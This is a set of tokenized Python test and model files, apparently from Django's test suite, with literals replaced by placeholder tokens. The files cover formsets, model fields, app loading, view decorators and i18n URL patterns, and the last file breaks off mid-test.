one_day_later = now + datetime . timedelta ( days = <NUM_LIT:1> ) <EOL> filled_data = { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : six . text_type ( one_day_later . strftime ( '<STR_LIT>' ) ) , <EOL> '<STR_LIT>' : six . text_type ( now . strftime ( '<STR_LIT>' ) ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> formset = FormSet ( filled_data , instance = person ) <EOL> self . assertFalse ( formset . is_valid ( ) ) <EOL> class MembershipForm ( forms . ModelForm ) : <EOL> date_joined = forms . SplitDateTimeField ( initial = now ) <EOL> class Meta : <EOL> model = Membership <EOL> def __init__ ( self , ** kwargs ) : <EOL> super ( MembershipForm , self ) . __init__ ( ** kwargs ) <EOL> self . fields [ '<STR_LIT>' ] . widget = forms . SplitDateTimeWidget ( ) <EOL> FormSet = inlineformset_factory ( Person , Membership , form = MembershipForm , can_delete = False , extra = <NUM_LIT:1> ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : six . text_type ( now . strftime ( '<STR_LIT>' ) ) , <EOL> '<STR_LIT>' : six . text_type ( now . strftime ( '<STR_LIT>' ) ) , <EOL> '<STR_LIT>' : six . text_type ( now . strftime ( '<STR_LIT>' ) ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> formset = FormSet ( data , instance = person ) <EOL> self . assertTrue ( formset . is_valid ( ) ) <EOL> def test_inlineformset_factory_with_null_fk ( self ) : <EOL> team = Team . objects . create ( name = "<STR_LIT>" ) <EOL> Player ( name = "<STR_LIT>" ) . save ( ) <EOL> Player ( name = "<STR_LIT>" , team = team ) . save ( ) <EOL> PlayerInlineFormSet = inlineformset_factory ( Team , Player ) <EOL> formset = PlayerInlineFormSet ( ) <EOL> self . assertQuerysetEqual ( formset . get_queryset ( ) , [ ] ) <EOL> formset = PlayerInlineFormSet ( instance = team ) <EOL> players = formset . get_queryset ( ) <EOL> self . assertEqual ( len ( players ) , <NUM_LIT:1> ) <EOL> player1 , = players <EOL> self . assertEqual ( player1 . team , team ) <EOL> self . assertEqual ( player1 . name , '<STR_LIT>' ) <EOL> def test_model_formset_with_custom_pk ( self ) : <EOL> FormSet = modelformset_factory ( ClassyMexicanRestaurant , fields = [ "<STR_LIT>" ] ) <EOL> self . assertEqual ( sorted ( FormSet ( ) . forms [ <NUM_LIT:0> ] . fields . keys ( ) ) , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def test_prevent_duplicates_from_with_the_same_formset ( self ) : <EOL> FormSet = modelformset_factory ( Product , extra = <NUM_LIT:2> ) <EOL> data = { <EOL> '<STR_LIT>' : <NUM_LIT:2> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> formset = FormSet ( data ) <EOL> self . assertFalse ( formset . is_valid ( ) ) <EOL> self . assertEqual ( formset . _non_form_errors , <EOL> [ '<STR_LIT>' ] ) <EOL> FormSet = modelformset_factory ( Price , extra = <NUM_LIT:2> ) <EOL> data = { <EOL> '<STR_LIT>' : <NUM_LIT:2> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> formset = FormSet ( data ) <EOL> self . assertFalse ( formset . is_valid ( ) ) <EOL> self . assertEqual ( formset . _non_form_errors , <EOL> [ '<STR_LIT>' ] ) <EOL> FormSet = modelformset_factory ( Price , fields = ( "<STR_LIT>" , ) , extra = <NUM_LIT:2> ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:2>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> formset = FormSet ( data ) <EOL> self . assertTrue ( formset . is_valid ( ) ) <EOL> FormSet = inlineformset_factory ( Author , Book , extra = <NUM_LIT:0> ) <EOL> author = Author . objects . create ( pk = <NUM_LIT:1> , name = '<STR_LIT>' ) <EOL> book1 = Book . objects . create ( pk = <NUM_LIT:1> , author = author , title = '<STR_LIT>' ) <EOL> book2 = Book . objects . create ( pk = <NUM_LIT:2> , author = author , title = '<STR_LIT>' ) <EOL> book3 = Book . objects . create ( pk = <NUM_LIT:3> , author = author , title = '<STR_LIT>' ) <EOL> book_ids = author . book_set . order_by ( '<STR_LIT:id>' ) . values_list ( '<STR_LIT:id>' , flat = True ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:2>' , <EOL> '<STR_LIT>' : '<STR_LIT:2>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : str ( author . id ) , <EOL> '<STR_LIT>' : str ( book_ids [ <NUM_LIT:0> ] ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : str ( author . id ) , <EOL> '<STR_LIT>' : str ( book_ids [ <NUM_LIT:1> ] ) , <EOL> } <EOL> formset = FormSet ( data = data , instance = author ) <EOL> self . assertFalse ( formset . is_valid ( ) ) <EOL> self . assertEqual ( formset . _non_form_errors , <EOL> [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( formset . errors , <EOL> [ { } , { '<STR_LIT>' : [ '<STR_LIT>' ] } ] ) <EOL> FormSet = modelformset_factory ( Post , extra = <NUM_LIT:2> ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:2>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:foo>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> formset = FormSet ( data ) <EOL> self . assertFalse ( formset . is_valid ( ) ) <EOL> self . assertEqual ( formset . _non_form_errors , <EOL> [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( formset . errors , <EOL> [ { } , { '<STR_LIT>' : [ '<STR_LIT>' ] } ] ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:2>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:foo>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:foo>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> formset = FormSet ( data ) <EOL> self . assertFalse ( formset . is_valid ( ) ) <EOL> self . assertEqual ( formset . _non_form_errors , <EOL> [ '<STR_LIT>' ] ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:2>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:foo>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> formset = FormSet ( data ) <EOL> self . assertFalse ( formset . is_valid ( ) ) <EOL> self . assertEqual ( formset . _non_form_errors , <EOL> [ '<STR_LIT>' ] ) </s>
<s> """<STR_LIT>""" <EOL> from django . db import models <EOL> from django . utils . encoding import python_2_unicode_compatible <EOL> class Article ( models . Model ) : <EOL> headline = models . CharField ( max_length = <NUM_LIT:100> ) <EOL> pub_date = models . DateTimeField ( ) <EOL> def __str__ ( self ) : <EOL> return self . headline <EOL> @ python_2_unicode_compatible <EOL> class BrokenArticle ( models . Model ) : <EOL> headline = models . CharField ( max_length = <NUM_LIT:100> ) <EOL> pub_date = models . DateTimeField ( ) <EOL> def __unicode__ ( self ) : <EOL> return self . headline <EOL> @ python_2_unicode_compatible <EOL> class InternationalArticle ( models . Model ) : <EOL> headline = models . CharField ( max_length = <NUM_LIT:100> ) <EOL> pub_date = models . DateTimeField ( ) <EOL> def __str__ ( self ) : <EOL> return self . headline </s>
<s> from __future__ import unicode_literals <EOL> from django . contrib . auth . models import User <EOL> from django . db import models <EOL> from django . utils . encoding import python_2_unicode_compatible <EOL> @ python_2_unicode_compatible <EOL> class Book ( models . Model ) : <EOL> title = models . CharField ( max_length = <NUM_LIT:50> ) <EOL> year = models . PositiveIntegerField ( null = True , blank = True ) <EOL> author = models . ForeignKey ( User , verbose_name = "<STR_LIT>" , related_name = '<STR_LIT>' , blank = True , null = True ) <EOL> contributors = models . ManyToManyField ( User , verbose_name = "<STR_LIT>" , related_name = '<STR_LIT>' , blank = True , null = True ) <EOL> is_best_seller = models . NullBooleanField ( default = <NUM_LIT:0> ) <EOL> date_registered = models . DateField ( null = True ) <EOL> no = models . IntegerField ( verbose_name = '<STR_LIT>' , blank = True , null = True ) <EOL> def __str__ ( self ) : <EOL> return self . title <EOL> @ python_2_unicode_compatible <EOL> class Department ( models . Model ) : <EOL> code = models . CharField ( max_length = <NUM_LIT:4> , unique = True ) <EOL> description = models . CharField ( max_length = <NUM_LIT:50> , blank = True , null = True ) <EOL> def __str__ ( self ) : <EOL> return self . description <EOL> @ python_2_unicode_compatible <EOL> class Employee ( models . Model ) : <EOL> department = models . ForeignKey ( Department , to_field = "<STR_LIT:code>" ) <EOL> name = models . CharField ( max_length = <NUM_LIT:100> ) <EOL> def __str__ ( self ) : <EOL> return self . name </s>
<s> from __future__ import absolute_import <EOL> import copy <EOL> import os <EOL> import sys <EOL> import time <EOL> from django . conf import Settings <EOL> from django . db . models . loading import cache , load_app , get_model , get_models <EOL> from django . utils . _os import upath <EOL> from django . utils . unittest import TestCase <EOL> class EggLoadingTest ( TestCase ) : <EOL> def setUp ( self ) : <EOL> self . old_path = sys . path [ : ] <EOL> self . egg_dir = '<STR_LIT>' % os . path . dirname ( upath ( __file__ ) ) <EOL> self . old_app_models = copy . deepcopy ( cache . app_models ) <EOL> self . old_app_store = copy . deepcopy ( cache . app_store ) <EOL> def tearDown ( self ) : <EOL> sys . path = self . old_path <EOL> cache . app_models = self . old_app_models <EOL> cache . app_store = self . old_app_store <EOL> def test_egg1 ( self ) : <EOL> """<STR_LIT>""" <EOL> egg_name = '<STR_LIT>' % self . egg_dir <EOL> sys . path . append ( egg_name ) <EOL> models = load_app ( '<STR_LIT>' ) <EOL> self . assertFalse ( models is None ) <EOL> def test_egg2 ( self ) : <EOL> """<STR_LIT>""" <EOL> egg_name = '<STR_LIT>' % self . egg_dir <EOL> sys . path . append ( egg_name ) <EOL> models = load_app ( '<STR_LIT>' ) <EOL> self . assertTrue ( models is None ) <EOL> def test_egg3 ( self ) : <EOL> """<STR_LIT>""" <EOL> egg_name = '<STR_LIT>' % self . egg_dir <EOL> sys . path . append ( egg_name ) <EOL> models = load_app ( '<STR_LIT>' ) <EOL> self . assertFalse ( models is None ) <EOL> def test_egg4 ( self ) : <EOL> """<STR_LIT>""" <EOL> egg_name = '<STR_LIT>' % self . egg_dir <EOL> sys . path . append ( egg_name ) <EOL> models = load_app ( '<STR_LIT>' ) <EOL> self . assertTrue ( models is None ) <EOL> def test_egg5 ( self ) : <EOL> """<STR_LIT>""" <EOL> egg_name = '<STR_LIT>' % self . egg_dir <EOL> sys . path . append ( egg_name ) <EOL> self . assertRaises ( ImportError , load_app , '<STR_LIT>' ) <EOL> try : <EOL> load_app ( '<STR_LIT>' ) <EOL> except ImportError as e : <EOL> self . assertTrue ( "<STR_LIT>" in e . args [ <NUM_LIT:0> ] ) <EOL> class GetModelsTest ( TestCase ) : <EOL> def setUp ( self ) : <EOL> from . not_installed import models <EOL> self . not_installed_module = models <EOL> def test_get_model_only_returns_installed_models ( self ) : <EOL> self . assertEqual ( <EOL> get_model ( "<STR_LIT>" , "<STR_LIT>" ) , None ) <EOL> def test_get_model_with_not_installed ( self ) : <EOL> self . assertEqual ( <EOL> get_model ( <EOL> "<STR_LIT>" , "<STR_LIT>" , only_installed = False ) , <EOL> self . not_installed_module . NotInstalledModel ) <EOL> def test_get_models_only_returns_installed_models ( self ) : <EOL> self . assertFalse ( <EOL> "<STR_LIT>" in <EOL> [ m . __name__ for m in get_models ( ) ] ) <EOL> def test_get_models_with_app_label_only_returns_installed_models ( self ) : <EOL> self . assertEqual ( get_models ( self . not_installed_module ) , [ ] ) <EOL> def test_get_models_with_not_installed ( self ) : <EOL> self . assertTrue ( <EOL> "<STR_LIT>" in [ <EOL> m . __name__ for m in get_models ( only_installed = False ) ] ) <EOL> class NotInstalledModelsTest ( TestCase ) : <EOL> def test_related_not_installed_model ( self ) : <EOL> from . not_installed . models import NotInstalledModel <EOL> self . assertEqual ( <EOL> set ( NotInstalledModel . _meta . get_all_field_names ( ) ) , <EOL> set ( [ "<STR_LIT:id>" , "<STR_LIT>" , "<STR_LIT>" ] ) ) </s>
<s> import warnings <EOL> from functools import wraps <EOL> from django . contrib . admin . views . decorators import staff_member_required <EOL> from django . contrib . auth . decorators import login_required , permission_required , user_passes_test <EOL> from django . http import HttpResponse , HttpRequest , HttpResponseNotAllowed <EOL> from django . middleware . clickjacking import XFrameOptionsMiddleware <EOL> from django . utils . decorators import method_decorator <EOL> from django . utils . functional import allow_lazy , lazy , memoize <EOL> from django . utils . unittest import TestCase <EOL> from django . views . decorators . cache import cache_page , never_cache , cache_control <EOL> from django . views . decorators . clickjacking import xframe_options_deny , xframe_options_sameorigin , xframe_options_exempt <EOL> from django . views . decorators . http import require_http_methods , require_GET , require_POST , require_safe , condition <EOL> from django . views . decorators . vary import vary_on_headers , vary_on_cookie <EOL> def fully_decorated ( request ) : <EOL> """<STR_LIT>""" <EOL> return HttpResponse ( '<STR_LIT>' ) <EOL> fully_decorated . anything = "<STR_LIT>" <EOL> def compose ( * functions ) : <EOL> functions = list ( reversed ( functions ) ) <EOL> def _inner ( * args , ** kwargs ) : <EOL> result = functions [ <NUM_LIT:0> ] ( * args , ** kwargs ) <EOL> for f in functions [ <NUM_LIT:1> : ] : <EOL> result = f ( result ) <EOL> return result <EOL> return _inner <EOL> full_decorator = compose ( <EOL> require_http_methods ( [ "<STR_LIT:GET>" ] ) , <EOL> require_GET , <EOL> require_POST , <EOL> require_safe , <EOL> condition ( lambda r : None , lambda r : None ) , <EOL> vary_on_headers ( '<STR_LIT>' ) , <EOL> vary_on_cookie , <EOL> cache_page ( <NUM_LIT> * <NUM_LIT:15> ) , <EOL> cache_control ( private = True ) , <EOL> never_cache , <EOL> user_passes_test ( lambda u : True ) , <EOL> login_required , <EOL> permission_required ( '<STR_LIT>' ) , <EOL> staff_member_required , <EOL> lambda f : memoize ( f , { } , <NUM_LIT:1> ) , <EOL> allow_lazy , <EOL> lazy , <EOL> ) <EOL> fully_decorated = full_decorator ( fully_decorated ) <EOL> class DecoratorsTest ( TestCase ) : <EOL> def test_attributes ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( fully_decorated . __name__ , '<STR_LIT>' ) <EOL> self . assertEqual ( fully_decorated . __doc__ , '<STR_LIT>' ) <EOL> self . assertEqual ( fully_decorated . __dict__ [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> def test_user_passes_test_composition ( self ) : <EOL> """<STR_LIT>""" <EOL> def test1 ( user ) : <EOL> user . decorators_applied . append ( '<STR_LIT>' ) <EOL> return True <EOL> def test2 ( user ) : <EOL> user . decorators_applied . append ( '<STR_LIT>' ) <EOL> return True <EOL> def callback ( request ) : <EOL> return request . user . decorators_applied <EOL> callback = user_passes_test ( test1 ) ( callback ) <EOL> callback = user_passes_test ( test2 ) ( callback ) <EOL> class DummyUser ( object ) : pass <EOL> class DummyRequest ( object ) : pass <EOL> request = DummyRequest ( ) <EOL> request . user = DummyUser ( ) <EOL> request . user . decorators_applied = [ ] <EOL> response = callback ( request ) <EOL> self . assertEqual ( response , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def test_cache_page_new_style ( self ) : <EOL> """<STR_LIT>""" <EOL> def my_view ( request ) : <EOL> return "<STR_LIT>" <EOL> my_view_cached = cache_page ( <NUM_LIT> ) ( my_view ) <EOL> self . assertEqual ( my_view_cached ( HttpRequest ( ) ) , "<STR_LIT>" ) <EOL> my_view_cached2 = cache_page ( <NUM_LIT> , key_prefix = "<STR_LIT:test>" ) ( my_view ) <EOL> self . assertEqual ( my_view_cached2 ( HttpRequest ( ) ) , "<STR_LIT>" ) <EOL> def test_cache_page_old_style ( self ) : <EOL> """<STR_LIT>""" <EOL> def my_view ( request ) : <EOL> return "<STR_LIT>" <EOL> with warnings . catch_warnings ( record = True ) : <EOL> my_view_cached = cache_page ( my_view , <NUM_LIT> ) <EOL> self . assertEqual ( my_view_cached ( HttpRequest ( ) ) , "<STR_LIT>" ) <EOL> my_view_cached2 = cache_page ( my_view , <NUM_LIT> , key_prefix = "<STR_LIT:test>" ) <EOL> self . assertEqual ( my_view_cached2 ( HttpRequest ( ) ) , "<STR_LIT>" ) <EOL> my_view_cached3 = cache_page ( my_view ) <EOL> self . assertEqual ( my_view_cached3 ( HttpRequest ( ) ) , "<STR_LIT>" ) <EOL> my_view_cached4 = cache_page ( ) ( my_view ) <EOL> self . assertEqual ( my_view_cached4 ( HttpRequest ( ) ) , "<STR_LIT>" ) <EOL> def test_require_safe_accepts_only_safe_methods ( self ) : <EOL> """<STR_LIT>""" <EOL> def my_view ( request ) : <EOL> return HttpResponse ( "<STR_LIT:OK>" ) <EOL> my_safe_view = require_safe ( my_view ) <EOL> request = HttpRequest ( ) <EOL> request . method = '<STR_LIT:GET>' <EOL> self . assertTrue ( isinstance ( my_safe_view ( request ) , HttpResponse ) ) <EOL> request . method = '<STR_LIT>' <EOL> self . assertTrue ( isinstance ( my_safe_view ( request ) , HttpResponse ) ) <EOL> request . method = '<STR_LIT:POST>' <EOL> self . assertTrue ( isinstance ( my_safe_view ( request ) , HttpResponseNotAllowed ) ) <EOL> request . method = '<STR_LIT>' <EOL> self . assertTrue ( isinstance ( my_safe_view ( request ) , HttpResponseNotAllowed ) ) <EOL> request . method = '<STR_LIT>' <EOL> self . assertTrue ( isinstance ( my_safe_view ( request ) , HttpResponseNotAllowed ) ) <EOL> def simple_dec ( func ) : <EOL> def wrapper ( arg ) : <EOL> return func ( "<STR_LIT>" + arg ) <EOL> return wraps ( func ) ( wrapper ) <EOL> simple_dec_m = method_decorator ( simple_dec ) <EOL> def myattr_dec ( func ) : <EOL> def wrapper ( * args , ** kwargs ) : <EOL> return func ( * args , ** kwargs ) <EOL> wrapper . myattr = True <EOL> return wraps ( func ) ( wrapper ) <EOL> myattr_dec_m = method_decorator ( myattr_dec ) <EOL> def myattr2_dec ( func ) : <EOL> def wrapper ( * args , ** kwargs ) : <EOL> return func ( * args , ** kwargs ) <EOL> wrapper . myattr2 = True <EOL> return wraps ( func ) ( wrapper ) <EOL> myattr2_dec_m = method_decorator ( myattr2_dec ) <EOL> class MethodDecoratorTests ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_preserve_signature ( self ) : <EOL> class Test ( object ) : <EOL> @ simple_dec_m <EOL> def say ( self , arg ) : <EOL> return arg <EOL> self . assertEqual ( "<STR_LIT>" , Test ( ) . say ( "<STR_LIT:hello>" ) ) <EOL> def test_preserve_attributes ( self ) : <EOL> @ myattr_dec <EOL> @ myattr2_dec <EOL> def func ( ) : <EOL> pass <EOL> self . assertEqual ( getattr ( func , '<STR_LIT>' , False ) , True ) <EOL> self . assertEqual ( getattr ( func , '<STR_LIT>' , False ) , True ) <EOL> class Test ( object ) : <EOL> @ myattr_dec_m <EOL> @ myattr2_dec_m <EOL> def method ( self ) : <EOL> "<STR_LIT>" <EOL> pass <EOL> self . assertEqual ( getattr ( Test ( ) . method , '<STR_LIT>' , False ) , True ) <EOL> self . assertEqual ( getattr ( Test ( ) . method , '<STR_LIT>' , False ) , True ) <EOL> self . assertEqual ( getattr ( Test . method , '<STR_LIT>' , False ) , True ) <EOL> self . assertEqual ( getattr ( Test . method , '<STR_LIT>' , False ) , True ) <EOL> self . assertEqual ( Test . method . __doc__ , '<STR_LIT>' ) <EOL> self . assertEqual ( Test . method . __name__ , '<STR_LIT>' ) <EOL> class XFrameOptionsDecoratorsTests ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_deny_decorator ( self ) : <EOL> """<STR_LIT>""" <EOL> @ xframe_options_deny <EOL> def a_view ( request ) : <EOL> return HttpResponse ( ) <EOL> r = a_view ( HttpRequest ( ) ) <EOL> self . assertEqual ( r [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> def test_sameorigin_decorator ( self ) : <EOL> """<STR_LIT>""" <EOL> @ xframe_options_sameorigin <EOL> def a_view ( request ) : <EOL> return HttpResponse ( ) <EOL> r = a_view ( HttpRequest ( ) ) <EOL> self . assertEqual ( r [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> def test_exempt_decorator ( self ) : <EOL> """<STR_LIT>""" <EOL> @ xframe_options_exempt <EOL> def a_view ( request ) : <EOL> return HttpResponse ( ) <EOL> req = HttpRequest ( ) <EOL> resp = a_view ( req ) <EOL> self . assertEqual ( resp . get ( '<STR_LIT>' , None ) , None ) <EOL> self . assertTrue ( resp . xframe_options_exempt ) <EOL> r = XFrameOptionsMiddleware ( ) . process_response ( req , resp ) <EOL> self . assertEqual ( r . get ( '<STR_LIT>' , None ) , None ) </s>
<s> from django . conf . urls import patterns , include , url <EOL> from django . conf . urls . i18n import i18n_patterns <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from django . views . generic import TemplateView <EOL> view = TemplateView . as_view ( template_name = '<STR_LIT>' ) <EOL> urlpatterns = patterns ( '<STR_LIT>' , <EOL> url ( r'<STR_LIT>' , view , name = '<STR_LIT>' ) , <EOL> url ( _ ( r'<STR_LIT>' ) , view , name = '<STR_LIT>' ) , <EOL> url ( _ ( r'<STR_LIT>' ) , view , name = '<STR_LIT>' ) , <EOL> ) <EOL> urlpatterns += i18n_patterns ( '<STR_LIT>' , <EOL> url ( r'<STR_LIT>' , view , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , view , name = '<STR_LIT>' ) , <EOL> url ( _ ( r'<STR_LIT>' ) , view , name = '<STR_LIT>' ) , <EOL> url ( _ ( r'<STR_LIT>' ) , include ( '<STR_LIT>' , namespace = '<STR_LIT>' ) ) , <EOL> ) </s>
<s> from __future__ import absolute_import , unicode_literals <EOL> import datetime <EOL> from decimal import Decimal <EOL> from django import test <EOL> from django import forms <EOL> from django . core . exceptions import ValidationError <EOL> from django . db import models <EOL> from django . db . models . fields . files import FieldFile <EOL> from django . utils import six <EOL> from django . utils import unittest <EOL> from . models import ( Foo , Bar , Whiz , BigD , BigS , Image , BigInt , Post , <EOL> NullBooleanModel , BooleanModel , Document , RenamedField , VerboseNameField , <EOL> FksToBooleans ) <EOL> from . imagefield import ( ImageFieldTests , ImageFieldTwoDimensionsTests , <EOL> TwoImageFieldTests , ImageFieldNoDimensionsTests , <EOL> ImageFieldOneDimensionTests , ImageFieldDimensionsFirstTests , <EOL> ImageFieldUsingFileTests ) <EOL> class BasicFieldTests ( test . TestCase ) : <EOL> def test_show_hidden_initial ( self ) : <EOL> """<STR_LIT>""" <EOL> choices = [ ( <NUM_LIT:0> , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) ] <EOL> model_field = models . Field ( choices = choices ) <EOL> form_field = model_field . formfield ( show_hidden_initial = True ) <EOL> self . assertTrue ( form_field . show_hidden_initial ) <EOL> form_field = model_field . formfield ( show_hidden_initial = False ) <EOL> self . assertFalse ( form_field . show_hidden_initial ) <EOL> def test_nullbooleanfield_blank ( self ) : <EOL> """<STR_LIT>""" <EOL> nullboolean = NullBooleanModel ( nbfield = None ) <EOL> try : <EOL> nullboolean . full_clean ( ) <EOL> except ValidationError as e : <EOL> self . fail ( "<STR_LIT>" % e . messages ) <EOL> def test_field_repr ( self ) : <EOL> """<STR_LIT>""" <EOL> f = Foo . _meta . get_field ( '<STR_LIT:a>' ) <EOL> self . assertEqual ( repr ( f ) , '<STR_LIT>' ) <EOL> f = models . fields . CharField ( ) <EOL> self . assertEqual ( repr ( f ) , '<STR_LIT>' ) <EOL> def test_field_name ( self ) : <EOL> """<STR_LIT>""" <EOL> instance = RenamedField ( ) <EOL> self . assertTrue ( hasattr ( instance , '<STR_LIT>' ) ) <EOL> self . assertFalse ( hasattr ( instance , '<STR_LIT>' ) ) <EOL> def test_field_verbose_name ( self ) : <EOL> m = VerboseNameField <EOL> for i in range ( <NUM_LIT:1> , <NUM_LIT> ) : <EOL> self . assertEqual ( m . _meta . get_field ( '<STR_LIT>' % i ) . verbose_name , <EOL> '<STR_LIT>' % i ) <EOL> self . assertEqual ( m . _meta . get_field ( '<STR_LIT:id>' ) . verbose_name , '<STR_LIT>' ) <EOL> class DecimalFieldTests ( test . TestCase ) : <EOL> def test_to_python ( self ) : <EOL> f = models . DecimalField ( max_digits = <NUM_LIT:4> , decimal_places = <NUM_LIT:2> ) <EOL> self . assertEqual ( f . to_python ( <NUM_LIT:3> ) , Decimal ( "<STR_LIT:3>" ) ) <EOL> self . assertEqual ( f . to_python ( "<STR_LIT>" ) , Decimal ( "<STR_LIT>" ) ) <EOL> self . assertRaises ( ValidationError , f . to_python , "<STR_LIT:abc>" ) <EOL> def test_default ( self ) : <EOL> f = models . DecimalField ( default = Decimal ( "<STR_LIT>" ) ) <EOL> self . assertEqual ( f . get_default ( ) , Decimal ( "<STR_LIT>" ) ) <EOL> def test_format ( self ) : <EOL> f = models . DecimalField ( max_digits = <NUM_LIT:5> , decimal_places = <NUM_LIT:1> ) <EOL> self . assertEqual ( f . _format ( f . to_python ( <NUM_LIT:2> ) ) , '<STR_LIT>' ) <EOL> self . assertEqual ( f . _format ( f . to_python ( '<STR_LIT>' ) ) , '<STR_LIT>' ) <EOL> self . assertEqual ( f . _format ( None ) , None ) <EOL> def test_get_db_prep_lookup ( self ) : <EOL> from django . db import connection <EOL> f = models . DecimalField ( max_digits = <NUM_LIT:5> , decimal_places = <NUM_LIT:1> ) <EOL> self . assertEqual ( f . get_db_prep_lookup ( '<STR_LIT>' , None , connection = connection ) , [ None ] ) <EOL> def test_filter_with_strings ( self ) : <EOL> """<STR_LIT>""" <EOL> Foo . objects . create ( id = <NUM_LIT:1> , a = '<STR_LIT:abc>' , d = Decimal ( "<STR_LIT>" ) ) <EOL> self . assertEqual ( list ( Foo . objects . filter ( d = '<STR_LIT>' ) ) , [ ] ) <EOL> def test_save_without_float_conversion ( self ) : <EOL> """<STR_LIT>""" <EOL> bd = BigD ( d = "<STR_LIT>" ) <EOL> bd . save ( ) <EOL> bd = BigD . objects . get ( pk = bd . pk ) <EOL> self . assertEqual ( bd . d , Decimal ( "<STR_LIT>" ) ) <EOL> def test_lookup_really_big_value ( self ) : <EOL> """<STR_LIT>""" <EOL> Foo . objects . filter ( d__gte = <NUM_LIT> ) <EOL> class ForeignKeyTests ( test . TestCase ) : <EOL> def test_callable_default ( self ) : <EOL> """<STR_LIT>""" <EOL> a = Foo . objects . create ( id = <NUM_LIT:1> , a = '<STR_LIT:abc>' , d = Decimal ( "<STR_LIT>" ) ) <EOL> b = Bar . objects . create ( b = "<STR_LIT>" ) <EOL> self . assertEqual ( b . a , a ) <EOL> class DateTimeFieldTests ( unittest . TestCase ) : <EOL> def test_datetimefield_to_python_usecs ( self ) : <EOL> """<STR_LIT>""" <EOL> f = models . DateTimeField ( ) <EOL> self . assertEqual ( f . to_python ( '<STR_LIT>' ) , <EOL> datetime . datetime ( <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> ) ) <EOL> self . assertEqual ( f . to_python ( '<STR_LIT>' ) , <EOL> datetime . datetime ( <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT> ) ) <EOL> def test_timefield_to_python_usecs ( self ) : <EOL> """<STR_LIT>""" <EOL> f = models . TimeField ( ) <EOL> self . assertEqual ( f . to_python ( '<STR_LIT>' ) , <EOL> datetime . time ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ) ) <EOL> self . assertEqual ( f . to_python ( '<STR_LIT>' ) , <EOL> datetime . time ( <NUM_LIT:1> , 